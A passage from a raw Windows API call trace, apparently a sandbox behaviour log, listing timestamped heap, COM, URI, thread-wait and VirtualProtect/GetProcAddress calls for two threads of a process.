dwFlags=0x0, lpMem=0x618bb8 | out: hHeap=0x5e0000) returned 1 [0132.870] IUnknown:Release (This=0x5f5f5c) returned 0xe [0132.870] IUnknown:Release (This=0x5fc930) returned 0x4 [0132.870] IUnknown:Release (This=0x5f5f5c) returned 0xd [0132.870] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x610c10 | out: hHeap=0x5e0000) returned 1 [0132.870] IUnknown:AddRef (This=0x5f5f5c) returned 0xe [0132.871] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x684fe04 | out: lpCPInfo=0x684fe04) returned 1 [0132.871] IUnknown:AddRef (This=0x5fc930) returned 0x5 [0132.871] IUnknown:AddRef (This=0x5f5f5c) returned 0xf [0132.871] IUnknown:QueryInterface (in: This=0x5f5f5c, riid=0x6d73333c*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x684fdd8 | out: ppvObject=0x684fdd8*=0x5f5f5c) returned 0x0 [0132.872] IUnknown:Release (This=0x5f5f5c) returned 0xf [0132.872] IUnknown:AddRef (This=0x5f5f5c) returned 0x10 [0132.872] IUri:GetScheme (in: This=0x5f5f5c, pdwScheme=0x684fe1c | out: pdwScheme=0x684fe1c*=0x9) returned 0x0 [0132.872] IUri:GetScheme (in: This=0x5f5f5c, pdwScheme=0x684fdfc | out: pdwScheme=0x684fdfc*=0x9) returned 0x0 [0132.872] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x1006) returned 0x610c10 [0132.872] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8006) returned 0x618bb8 [0132.872] memcpy_s (in: _Destination=0x618bbc, _DestinationSize=0x8002, _Source=0x618318, _SourceSize=0x160 | out: _Destination=0x618bbc) returned 0x0 [0132.872] IUnknown:Release (This=0x5f5f5c) returned 0xf [0132.873] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x4000) returned 0x649cf0 [0132.874] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x649cf0 | out: hHeap=0x5e0000) returned 1 [0132.874] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x108) returned 0x611d10 [0132.874] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x12) returned 0x62a890 [0132.874] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x62a890 | out: hHeap=0x5e0000) returned 1 [0132.875] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x12) returned 0x62a890 [0132.875] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x208) returned 0x646e58 [0132.875] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x62a890 | out: hHeap=0x5e0000) returned 1 [0132.875] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x611d10 | out: hHeap=0x5e0000) returned 1 [0132.875] CoWaitForMultipleHandles (in: dwFlags=0x0, dwTimeout=0x927c0, cHandles=0x1, pHandles=0xcfc400*=0x29c, lpdwindex=0x684ff60 | out: lpdwindex=0x684ff60) returned 0x0 [0134.218] GetCurrentThreadId () returned 0x3ec [0134.218] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x616752, cbMultiByte=0, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 0 [0134.219] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x12) returned 0x67cef0 [0134.219] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x67cef0 | out: hHeap=0x5e0000) returned 1 [0134.219] GetCurrentThreadId () returned 0x3ec [0134.219] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x646e58 | out: hHeap=0x5e0000) returned 1 [0134.219] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x618bb8 | out: hHeap=0x5e0000) returned 1 [0134.219] IUnknown:Release (This=0x5f5f5c) returned 0xe [0134.220] IUnknown:Release (This=0x5fc930) returned 0x4 [0134.220] IUnknown:Release (This=0x5f5f5c) returned 0xd [0134.220] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x610c10 | out: hHeap=0x5e0000) returned 1 [0134.220] IUnknown:AddRef (This=0x5f5f5c) returned 0xe [0134.224] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x684fe04 | out: lpCPInfo=0x684fe04) returned 1 [0134.224] IUnknown:AddRef (This=0x5fc930) returned 0x5 [0134.224] IUnknown:AddRef (This=0x5f5f5c) returned 0xf [0134.224] IUnknown:QueryInterface (in: This=0x5f5f5c, riid=0x6d73333c*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x684fdd8 | out: ppvObject=0x684fdd8*=0x5f5f5c) returned 0x0 [0134.225] IUnknown:Release (This=0x5f5f5c) returned 0xf [0134.225] IUnknown:AddRef (This=0x5f5f5c) returned 0x10 [0134.225] IUri:GetScheme (in: This=0x5f5f5c, pdwScheme=0x684fe1c | out: pdwScheme=0x684fe1c*=0x9) returned 0x0 [0134.225] IUri:GetScheme (in: This=0x5f5f5c, pdwScheme=0x684fdfc | out: pdwScheme=0x684fdfc*=0x9) returned 0x0 [0134.225] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x1006) returned 0x610c10 [0134.225] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8006) returned 0x618bb8 [0134.225] memcpy_s (in: _Destination=0x618bbc, _DestinationSize=0x8002, _Source=0x6183dc, _SourceSize=0x9c | out: _Destination=0x618bbc) returned 0x0 [0134.225] IUnknown:Release (This=0x5f5f5c) returned 0xf [0134.226] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x4000) returned 0x690770 [0134.227] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x690770 | out: hHeap=0x5e0000) returned 1 [0134.227] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x108) returned 0x690770 [0134.227] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x12) returned 0x67d230 [0134.228] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x67d230 | out: hHeap=0x5e0000) returned 1 [0134.228] CoWaitForMultipleHandles (in: dwFlags=0x0, dwTimeout=0x927c0, cHandles=0x1, pHandles=0xcfc400*=0x29c, lpdwindex=0x684ff60 | out: lpdwindex=0x684ff60) returned 0x0 [0159.138] GetCurrentThreadId () returned 0x3ec [0159.138] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x1006) returned 0x9ee4068 [0159.138] memcpy_s (in: _Destination=0x9ee4068, _DestinationSize=0x1000, _Source=0x9ee5084, _SourceSize=0xcaf | out: _Destination=0x9ee4068) returned 0x0 [0159.138] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ee5078 | out: hHeap=0x5e0000) returned 1 [0159.138] GetCurrentThreadId () returned 0x3ec [0159.139] GetCurrentThreadId () returned 0x3ec [0159.139] GetCurrentThreadId () returned 0x3ec [0159.139] GetCurrentThreadId () returned 0x3ec [0159.140] memcpy_s (in: _Destination=0xd61000, _DestinationSize=0x1000, _Source=0x9ee4068, _SourceSize=0xcaf | out: _Destination=0xd61000) returned 0x0 [0159.140] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x195e) returned 0x9ee5078 [0159.140] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x108) returned 0x6bdaa8 [0159.140] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x208) returned 0x6bac20 [0159.140] CompareStringW (Locale=0x409, dwCmpFlags=0x30001, lpString1="Content-Type", cchCount1=12, lpString2="Set-Cookie", cchCount2=-1) returned 1 [0159.141] CompareStringW (Locale=0x409, dwCmpFlags=0x30001, lpString1="Content-Type", cchCount1=12, lpString2="content-type", cchCount2=-1) returned 2 [0159.141] CompareStringW (Locale=0x409, dwCmpFlags=0x30001, lpString1="text/html; charset=utf-8", cchCount1=7, lpString2="charset", cchCount2=7) returned 3 [0159.141] CompareStringW (Locale=0x409, dwCmpFlags=0x30001, lpString1="charset=utf-8", cchCount1=7, lpString2="charset", cchCount2=7) returned 2 [0159.141] CompareStringW (Locale=0x409, dwCmpFlags=0x30001, lpString1="Content-Type", cchCount1=12, lpString2="Default-Style", cchCount2=-1) returned 1 [0159.141] CompareStringW (Locale=0x409, dwCmpFlags=0x30001, lpString1="MSThemeCompatible", cchCount1=17, lpString2="Set-Cookie", cchCount2=-1) returned 1 [0159.141] CompareStringW (Locale=0x409, dwCmpFlags=0x30001, lpString1="MSThemeCompatible", cchCount1=17, lpString2="Default-Style", cchCount2=-1) returned 3 [0159.141] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x408) returned 0x9ee69e0 [0159.141] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x12) returned 0x6d8be8 [0159.141] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d8be8 | out: hHeap=0x5e0000) returned 1 [0159.141] GetCurrentThreadId () returned 0x3ec [0159.141] IUnknown:AddRef (This=0x68e73c) returned 0x14 [0159.142] IUnknown:AddRef (This=0x68e73c) returned 0x15 [0159.142] IUnknown:QueryInterface (in: This=0x68e73c, riid=0x6d73333c*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x684fdd8 | out: ppvObject=0x684fdd8*=0x68e73c) returned 0x0 [0159.142] IUnknown:Release (This=0x68e73c) returned 0x15 [0159.143] IUnknown:AddRef (This=0x68e73c) returned 0x16 [0159.143] IUri:GetScheme (in: This=0x68e73c, pdwScheme=0x684fe1c | out: pdwScheme=0x684fe1c*=0x12) returned 0x0 [0159.143] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x1006) returned 0x9ee6df0 [0159.143] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8006) returned 0x9ee7e00 [0159.144] memcpy_s (in: _Destination=0x9ee7e04, _DestinationSize=0x8002, _Source=0x9ee55b6, _SourceSize=0x141e | out: _Destination=0x9ee7e04) returned 0x0 [0159.144] IUnknown:Release (This=0x68e73c) returned 0x15 [0159.144] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x4000) returned 0x9eefe10 [0159.148] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9eefe10 | out: hHeap=0x5e0000) returned 1 [0159.148] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x108) returned 0x6bdbc0 [0159.148] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x12) returned 0x6d8d28 [0159.148] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d8d28 | out: hHeap=0x5e0000) returned 1 [0159.149] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x208) returned 0x6ba9f8 [0159.149] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6bdbc0 | out: hHeap=0x5e0000) returned 1 [0159.149] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x408) returned 0x9eefe10 [0159.149] memcpy_s (in: _Destination=0x9eefe18, _DestinationSize=0x400, _Source=0x6bab94, _SourceSize=0x4c | out: _Destination=0x9eefe18) returned 0x0 [0159.149] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6ba9f8 | out: hHeap=0x5e0000) returned 1 [0159.149] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x4, lpflOldProtect=0x6e793704 | out: lpflOldProtect=0x6e793704*=0x2) returned 1 [0159.150] GetProcAddress (hModule=0x701a0000, lpProcName="InternetGetConnectedState") returned 0x701f9c70 [0159.151] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x2, lpflOldProtect=0x684fd0c | out: lpflOldProtect=0x684fd0c*=0x4) returned 1 [0159.151] InternetGetConnectedState (in: lpdwFlags=0x684fd84, dwReserved=0x0 | out: lpdwFlags=0x684fd84*=0x12) returned 1 [0159.152] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x808) returned 0x9ef0220 [0159.152] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9eefe10 | out: hHeap=0x5e0000) returned 1 [0159.152] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x1008) returned 0x9ef0a30 [0159.153] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ef0220 | out: hHeap=0x5e0000) returned 1 [0159.153] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x1008) returned 0x9ef1a40 [0159.153] memcpy_s (in: _Destination=0x9ef1a48, _DestinationSize=0x1000, _Source=0x9ef19f4, _SourceSize=0x28 | out: _Destination=0x9ef1a48) returned 0x0 [0159.153] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ef0a30 | out: hHeap=0x5e0000) returned 1 [0159.153] CoWaitForMultipleHandles (in: dwFlags=0x0, dwTimeout=0x927c0, cHandles=0x1, pHandles=0xcfc400*=0x29c, lpdwindex=0x684ff60 | out: lpdwindex=0x684ff60) returned 0x0 [0159.257] CoWaitForMultipleHandles (in: dwFlags=0x0, dwTimeout=0x927c0, cHandles=0x1, pHandles=0xcfc400*=0x29c, lpdwindex=0x684ff60 | out: lpdwindex=0x684ff60) returned 0x0 [0159.384] GetCurrentThreadId () returned 0x3ec [0159.384] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x12) returned 0x6d8ca8 [0159.385] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d8ca8 | out: hHeap=0x5e0000) returned 1 [0159.385] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x808) returned 0x6ddfb8 [0159.385] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x1008) returned 0x6d9748 [0159.385] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x1008) returned 0x9eefe10 [0159.386] CoWaitForMultipleHandles (in: dwFlags=0x0, dwTimeout=0x927c0, cHandles=0x1, pHandles=0xcfc400*=0x29c, lpdwindex=0x684ff60 | out: lpdwindex=0x684ff60) returned 0x0 [0187.348] GetCurrentThreadId () returned 0x3ec [0187.348] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x12) returned 0x6dc860 [0187.349] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6dc860 | out: hHeap=0x5e0000) returned 1 [0187.349] GetCurrentThreadId () returned 0x3ec [0187.349] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x690770 | out: hHeap=0x5e0000) returned 1 [0187.349] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x618bb8 | out: hHeap=0x5e0000) returned 1 [0187.349] IUnknown:Release (This=0x5f5f5c) returned 0xe [0187.349] IUnknown:Release (This=0x5fc930) returned 0x4 [0187.349] IUnknown:Release (This=0x5f5f5c) returned 0xd [0187.350] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x610c10 | out: hHeap=0x5e0000) returned 1 [0187.350] IUnknown:AddRef (This=0x5f5f5c) returned 0xe [0187.350] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x684fe04 | out: lpCPInfo=0x684fe04) returned 1 [0187.350] IUnknown:AddRef (This=0x5fc930) returned 0x5 [0187.351] IUnknown:AddRef (This=0x5f5f5c) returned 0xf [0187.351] IUnknown:QueryInterface (in: This=0x5f5f5c, riid=0x6d73333c*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x684fdd8 | out: ppvObject=0x684fdd8*=0x5f5f5c) returned 0x0 [0187.351] IUnknown:Release (This=0x5f5f5c) returned 0xf [0187.351] IUnknown:AddRef (This=0x5f5f5c) returned 0x10 [0187.351] IUri:GetScheme (in: This=0x5f5f5c, pdwScheme=0x684fe1c | out: pdwScheme=0x684fe1c*=0x9) returned 0x0 [0187.351] IUri:GetScheme (in: This=0x5f5f5c, pdwScheme=0x684fdfc | out: pdwScheme=0x684fdfc*=0x9) returned 0x0 [0187.352] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x1006) returned 0x610c10 [0187.352] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8006) returned 0x618bb8 [0187.352] memcpy_s (in: _Destination=0x618bbc, _DestinationSize=0x8002, _Source=0x618458, _SourceSize=0x20 | out: _Destination=0x618bbc) returned 0x0 [0187.352] IUnknown:Release (This=0x5f5f5c) returned 0xf [0187.352] PostMessageW (hWnd=0x30316, Msg=0x8002, wParam=0x0, lParam=0x0) returned 1 [0187.365] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x4000) returned 0x9f9a968 [0187.365] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f9a968 | out: hHeap=0x5e0000) returned 1 [0187.365] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x108) returned 0x60cf00 [0187.366] CoWaitForMultipleHandles (in: dwFlags=0x0, dwTimeout=0x927c0, cHandles=0x1, pHandles=0xcfc400*=0x29c, lpdwindex=0x684ff60 | out: lpdwindex=0x684ff60) returned 0x0 [0187.529] GetCurrentThreadId () returned 0x3ec [0187.529] PostMessageW (hWnd=0x30316, Msg=0x8002, wParam=0x0, lParam=0x0) returned 1 [0187.532] CoWaitForMultipleHandles (in: dwFlags=0x0, dwTimeout=0x927c0, cHandles=0x1, pHandles=0xcfc400*=0x29c, lpdwindex=0x684ff60 | out: lpdwindex=0x684ff60) returned 0x0 [0188.056] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x4, lpflOldProtect=0x6e793704 | out: lpflOldProtect=0x6e793704*=0x2) returned 1 [0188.057] GetProcAddress (hModule=0x76da0000, lpProcName="CoUninitialize") returned 0x76df92a0 [0188.057] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x2, lpflOldProtect=0x684fef8 | out: lpflOldProtect=0x684fef8*=0x4) returned 1 [0188.057] CoUninitialize () [0188.059] FreeLibraryAndExitThread (hLibModule=0x6d6d0000, dwExitCode=0x0) [0188.059] RtlTryEnterCriticalSection (CriticalSection=0x6cd09fe8) returned 1 [0188.059] GetCurrentThreadId () returned 0x3ec Thread: id = 36 os_tid = 0x464 [0132.057] GetCurrentThreadId () returned 0x464 [0132.057] GetModuleHandleExW (in: dwFlags=0x4, lpModuleName=0x6dd5cca0, phModule=0x698ff7c | out: phModule=0x698ff7c*=0x6d6d0000) returned 1 [0132.057] QueryPerformanceCounter (in: lpPerformanceCount=0x698ff30 | out: lpPerformanceCount=0x698ff30*=3095087652959) returned 1 [0132.058] WaitForSingleObject (hHandle=0x304, dwMilliseconds=0xffffffff) returned 0x0 [0132.058] QueryPerformanceCounter (in: lpPerformanceCount=0x698ff30 | out: lpPerformanceCount=0x698ff30*=3095087711967) returned 1 [0132.058] WaitForSingleObject (hHandle=0x304, dwMilliseconds=0xffffffff) returned 0x0 [0133.381] QueryPerformanceCounter (in: lpPerformanceCount=0x698ff30 | out: lpPerformanceCount=0x698ff30*=3095219977734) returned 1 [0133.381] WaitForSingleObject (hHandle=0x304, dwMilliseconds=0x5e) returned 0x102 [0133.523] QueryPerformanceCounter (in: lpPerformanceCount=0x698ff30 | out: lpPerformanceCount=0x698ff30*=3095234212393) returned 1 [0133.524] WaitForSingleObject (hHandle=0x304, dwMilliseconds=0xffffffff) returned 0x0 [0159.179] QueryPerformanceCounter (in: lpPerformanceCount=0x698ff30 | out: lpPerformanceCount=0x698ff30*=3097799758651) returned 1 [0159.179] WaitForSingleObject (hHandle=0x304, dwMilliseconds=0x5d) returned 0x102 [0159.332] QueryPerformanceCounter (in: lpPerformanceCount=0x698ff30 | out: lpPerformanceCount=0x698ff30*=3097815085898) returned 1 [0159.332] WaitForSingleObject (hHandle=0x304, dwMilliseconds=0xffffffff) returned 0x0 [0159.503] QueryPerformanceCounter (in: lpPerformanceCount=0x698ff30 | out: lpPerformanceCount=0x698ff30*=3097832216433) returned 1 [0159.503] WaitForSingleObject (hHandle=0x304, dwMilliseconds=0x63) returned 0x102 [0159.664] QueryPerformanceCounter (in: lpPerformanceCount=0x698ff30 | out: lpPerformanceCount=0x698ff30*=3097848320842) returned 1 [0159.665] WaitForSingleObject (hHandle=0x304, dwMilliseconds=0xffffffff) returned 0x0 [0159.763] QueryPerformanceCounter (in: lpPerformanceCount=0x698ff30 | out: lpPerformanceCount=0x698ff30*=3097858228557) returned 1 [0159.763] WaitForSingleObject (hHandle=0x304, dwMilliseconds=0x52) returned 0x102 [0159.845] QueryPerformanceCounter (in: lpPerformanceCount=0x698ff30 | out: lpPerformanceCount=0x698ff30*=3097866420765) returned 1 [0159.845] WaitForSingleObject (hHandle=0x304, dwMilliseconds=0xffffffff) returned 0x0 [0160.024] QueryPerformanceCounter (in: lpPerformanceCount=0x698ff30 | out: lpPerformanceCount=0x698ff30*=3097884296582) returned 1 [0160.024] WaitForSingleObject (hHandle=0x304, dwMilliseconds=0x61) returned 0x102 [0160.121] QueryPerformanceCounter (in: lpPerformanceCount=0x698ff30 | out: lpPerformanceCount=0x698ff30*=3097894000507) returned 1 [0160.122] WaitForSingleObject (hHandle=0x304, dwMilliseconds=0xffffffff) returned 0x0 [0161.117] QueryPerformanceCounter (in: lpPerformanceCount=0x698ff30 | out: lpPerformanceCount=0x698ff30*=3097993577216) returned 1 [0161.117] WaitForSingleObject (hHandle=0x304, dwMilliseconds=0x63) returned 0x0 [0161.180] QueryPerformanceCounter (in: lpPerformanceCount=0x698ff30 | out: lpPerformanceCount=0x698ff30*=3097999918215) returned 1 [0161.180] WaitForSingleObject (hHandle=0x304, dwMilliseconds=0xe) returned 0x102 [0161.195] QueryPerformanceCounter (in: lpPerformanceCount=0x698ff30 | out: lpPerformanceCount=0x698ff30*=3098001364420) returned 1 [0161.195] WaitForSingleObject (hHandle=0x304, dwMilliseconds=0xffffffff) returned 0x0 [0161.615] QueryPerformanceCounter (in: lpPerformanceCount=0x698ff30 | out: lpPerformanceCount=0x698ff30*=3098043430938) returned 1 [0161.615] WaitForSingleObject (hHandle=0x304, dwMilliseconds=0xd) returned 0x102 [0161.679] QueryPerformanceCounter (in: lpPerformanceCount=0x698ff30 | out: lpPerformanceCount=0x698ff30*=3098049784175) returned 1 [0161.679] WaitForSingleObject (hHandle=0x304, dwMilliseconds=0xffffffff) returned 0x0 [0162.471] QueryPerformanceCounter (in: lpPerformanceCount=0x698ff30 | out: lpPerformanceCount=0x698ff30*=3098129022533) returned 1 [0162.471] WaitForSingleObject (hHandle=0x304, dwMilliseconds=0x5a) returned 0x102 [0162.627] QueryPerformanceCounter (in: lpPerformanceCount=0x698ff30 | out: lpPerformanceCount=0x698ff30*=3098144588942) returned 1 [0162.627] WaitForSingleObject (hHandle=0x304, dwMilliseconds=0xffffffff) returned 0x0 [0163.809] QueryPerformanceCounter (in: lpPerformanceCount=0x698ff30 | out: lpPerformanceCount=0x698ff30*=3098262797832) returned 1 [0163.809] WaitForSingleObject (hHandle=0x304, dwMilliseconds=0x5d) returned 0x102 [0163.907] QueryPerformanceCounter (in: lpPerformanceCount=0x698ff30 | out: lpPerformanceCount=0x698ff30*=3098272650256) returned 1 [0163.908] WaitForSingleObject (hHandle=0x304, dwMilliseconds=0xffffffff) returned 0x0 [0164.640] QueryPerformanceCounter (in: lpPerformanceCount=0x698ff30 | out: lpPerformanceCount=0x698ff30*=3098345924977) returned 1 [0164.641] PostMessageW (hWnd=0x30316, Msg=0x8002, wParam=0x0, lParam=0x0) returned 1 [0164.641] WaitForSingleObject (hHandle=0x304, dwMilliseconds=0xffffffff) returned 0x0 [0164.741] QueryPerformanceCounter (in: lpPerformanceCount=0x698ff30 | out: lpPerformanceCount=0x698ff30*=3098356021945) returned 1 [0164.741] WaitForSingleObject (hHandle=0x304, dwMilliseconds=0xffffffff) returned 0x0 [0168.035] QueryPerformanceCounter (in: lpPerformanceCount=0x698ff30 | out: lpPerformanceCount=0x698ff30*=3098685441985) returned 1 [0168.035] WaitForSingleObject (hHandle=0x304, dwMilliseconds=0x63) returned 0x102 [0168.134] QueryPerformanceCounter (in: lpPerformanceCount=0x698ff30 | out: lpPerformanceCount=0x698ff30*=3098695328354) returned 1 [0168.134] WaitForSingleObject (hHandle=0x304, dwMilliseconds=0xffffffff) returned 0x0 [0168.505] QueryPerformanceCounter (in: lpPerformanceCount=0x698ff30 | out: lpPerformanceCount=0x698ff30*=3098732452773) returned 1 [0168.506] WaitForSingleObject (hHandle=0x304, dwMilliseconds=0xf) returned 0x102 [0168.656] QueryPerformanceCounter (in: lpPerformanceCount=0x698ff30 | out: lpPerformanceCount=0x698ff30*=3098747498111) returned 1 [0168.656] PostMessageW (hWnd=0x30316, Msg=0x8002, wParam=0x0, lParam=0x0) returned 1 [0168.656] WaitForSingleObject (hHandle=0x304, dwMilliseconds=0xffffffff) returned 0x0 [0168.754] QueryPerformanceCounter (in: lpPerformanceCount=0x698ff30 | out: lpPerformanceCount=0x698ff30*=3098757351747) returned 1 [0168.755] WaitForSingleObject (hHandle=0x304, dwMilliseconds=0xffffffff) returned 0x0 [0172.089] QueryPerformanceCounter (in: lpPerformanceCount=0x698ff30 | out: lpPerformanceCount=0x698ff30*=3099090793800) returned 1 [0172.089] WaitForSingleObject (hHandle=0x304, dwMilliseconds=0xe) returned 0x102 [0172.104] QueryPerformanceCounter (in: lpPerformanceCount=0x698ff30 | out: lpPerformanceCount=0x698ff30*=3099092269413) returned 1 [0172.104] WaitForSingleObject (hHandle=0x304, dwMilliseconds=0xffffffff) returned 0x0 [0172.559] QueryPerformanceCounter (in: lpPerformanceCount=0x698ff30 | out: lpPerformanceCount=0x698ff30*=3099137782193) returned 1 [0172.559] PostMessageW (hWnd=0x30316, Msg=0x8002, wParam=0x0, lParam=0x0) returned 1 [0172.559] WaitForSingleObject (hHandle=0x304, dwMilliseconds=0xffffffff) returned 0x0 [0172.847] QueryPerformanceCounter (in: lpPerformanceCount=0x698ff30 | out: lpPerformanceCount=0x698ff30*=3099166644966) returned 1 [0172.847] WaitForSingleObject (hHandle=0x304, dwMilliseconds=0xffffffff) returned 0x0 [0176.654] QueryPerformanceCounter (in: lpPerformanceCount=0x698ff30 | out: lpPerformanceCount=0x698ff30*=3099547255626) returned 1 [0176.654] WaitForSingleObject (hHandle=0x304, dwMilliseconds=0x27) returned 0x102 [0177.081] QueryPerformanceCounter (in: lpPerformanceCount=0x698ff30 | out: lpPerformanceCount=0x698ff30*=3099590037037) returned 1 [0177.081] WaitForSingleObject (hHandle=0x304, dwMilliseconds=0xffffffff) returned 0x0 [0180.719] QueryPerformanceCounter (in: lpPerformanceCount=0x698ff30 | out: lpPerformanceCount=0x698ff30*=3099953772876) returned 1 [0180.719] WaitForSingleObject (hHandle=0x304, dwMilliseconds=0x1c) returned 0x102 [0181.164] QueryPerformanceCounter (in: lpPerformanceCount=0x698ff30 | out: lpPerformanceCount=0x698ff30*=3099998290121) returned 1 [0181.164] WaitForSingleObject (hHandle=0x304, dwMilliseconds=0xffffffff) returned 0x0 [0181.357] QueryPerformanceCounter (in: lpPerformanceCount=0x698ff30 | out: lpPerformanceCount=0x698ff30*=3100017564027) returned 1 [0181.357] WaitForSingleObject (hHandle=0x304, dwMilliseconds=0xffffffff) returned 0x0 [0184.831] QueryPerformanceCounter (in: lpPerformanceCount=0x698ff30 | out: lpPerformanceCount=0x698ff30*=3100365030644) returned 1 [0184.831] WaitForSingleObject (hHandle=0x304, dwMilliseconds=0x5c) returned 0x102 [0184.924] QueryPerformanceCounter (in: lpPerformanceCount=0x698ff30 | out: lpPerformanceCount=0x698ff30*=3100374280681) returned 1 [0184.940] PostMessageW (hWnd=0x30316, Msg=0x8002, wParam=0x0, lParam=0x0) returned 1 [0184.940] WaitForSingleObject (hHandle=0x304, dwMilliseconds=0xffffffff) returned 0x0 [0184.942] QueryPerformanceCounter (in: lpPerformanceCount=0x698ff30 | out: lpPerformanceCount=0x698ff30*=3100376072180) returned 1 [0184.942] WaitForSingleObject (hHandle=0x304, dwMilliseconds=0x52) returned 0x102 [0185.025] QueryPerformanceCounter (in: lpPerformanceCount=0x698ff30 | out: lpPerformanceCount=0x698ff30*=3100384395762) returned 1 [0185.025] WaitForSingleObject (hHandle=0x304, dwMilliseconds=0xffffffff) returned 0x0 [0187.476] QueryPerformanceCounter (in: lpPerformanceCount=0x698ff30 | out: lpPerformanceCount=0x698ff30*=3100629468116) returned 1 [0187.476] WaitForSingleObject (hHandle=0x304, dwMilliseconds=0x1) returned 0x102 [0187.477] QueryPerformanceCounter (in: lpPerformanceCount=0x698ff30 | out: 